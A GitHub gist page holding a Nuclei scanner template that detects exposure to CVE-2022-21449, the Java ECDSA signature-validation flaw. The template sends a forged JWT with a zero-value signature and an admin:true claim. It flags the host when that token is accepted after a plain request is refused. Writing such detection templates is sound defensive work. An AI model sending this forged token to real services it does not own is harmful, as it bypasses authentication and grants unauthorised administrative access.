Skip to content

Instantly share code, notes, and snippets.

@emadshanab
Forked from righettod/CVE-2022-21449.yaml
Created December 18, 2023 06:50
Show Gist options
  • Save emadshanab/a35850d66b3cee2ea04c969555d8afe0 to your computer and use it in GitHub Desktop.
Save emadshanab/a35850d66b3cee2ea04c969555d8afe0 to your computer and use it in GitHub Desktop.
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
id: CVE-2022-21449
info:
name: CVE-2022-21449 test exposure
description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place.
author: righettod
severity: info
tags: cve,2022,java
reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java
requests:
- raw:
- |
GET /?id={{randstr}} HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-store
- |
GET /?id={{randstr}} HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
Cache-Control: no-store
req-condition: true
matchers:
- type: dsl
dsl:
- '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment